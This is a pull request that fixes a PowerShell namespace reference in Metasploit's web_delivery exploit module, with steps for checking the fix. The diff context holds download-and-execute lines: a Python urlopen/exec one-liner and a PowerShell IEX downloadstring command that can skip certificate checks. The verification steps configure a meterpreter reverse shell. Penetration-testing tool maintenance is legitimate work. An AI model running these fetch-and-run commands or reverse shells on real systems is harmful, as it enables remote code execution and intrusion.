### PR TITLE
Resolves #5199 - Powershell Namespace in Web Delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
-      ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      ignore_cert = Rex:::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
-      ignore_cert = Rex:::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,


### PR DESCRIPTION
https://github.com/rapid7/metasploit-framework/issues/5199

A small part of the web_delivery module didn't get picked up in the Powershell refactor of https://github.com/rapid7/metasploit-framework/pull/4744
# Verification
- use exploit/multi/script/web_delivery
- set TARGET 2
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST blah
- set SSL true
- run 
- [ ] Run command on target, command should connect back even though an invalid cert is in use.
